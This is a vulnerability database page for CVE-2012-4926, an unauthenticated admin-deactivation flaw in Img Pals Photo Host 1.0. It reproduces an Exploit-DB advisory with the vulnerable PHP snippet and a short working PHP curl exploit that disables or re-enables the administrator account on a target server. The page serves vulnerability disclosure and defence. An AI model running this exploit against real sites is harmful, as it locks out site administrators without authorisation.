CVE-2012-4926
Description
approve.php in Img Pals Photo Host 1.0 does not authenticate requests, which allows remote attackers to change the activation of administrators via the u parameter in an (1) app0 (disable) or (2) app1 (enable) action.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ImgPals Photo Host 1.0 - Admin Account Disactivation
-=[--------------------ADVISORY-------------------]=-
ImgPals Photo Host Version 1.0 STABLE
Author: Corrado Liotta Aka CorryL [corryl80@gmail.com]
-=[-----------------------------------------------]=-
-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Disactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
...::[ Descriprion ]::..
I released the ImgPals Photo Host Version 1.0 STABLE
Features Include:
* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
o Multiple JQuery Uploads
o Create and Edit Photo Albums
o Make Albums Public or Private
o Describe Albums and Photos
o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
o Add Friends
o Chat with Friends
o Update people with status wall posting
o Manage Profile
o Profile Avatar Uploads
o Private Messaging
* And much more, be sure to check out the Demo
...::[ Bug ]::..
A attaker can remotely disable the account from administratore not
allowing the same to be able to access the site
...::[ Proof Of Concept ]::..
if ($_GET['a'] == 'app0'){
$sqlapprove = mysql_query("UPDATE members SET
approved = '0' WHERE id = '".$_GET['u']."'");
by sending the command approve.php? u = a = 1 & app0 a attaker can
disable the Administrator account.
...::[ Exploit ]::..
#!/usr/bin/php -f
<?php
//Coded by Corrado Liotta For educational purpose only
//use php exploit.php server app0 or app1
//use app0 for admin account off
//use app1 for admin account on
$target = $argv[1];
$power = $argv[2]
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| imgpals | img_pals_photo_host | 1.0 | |
References
CWEs
CWE-287
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.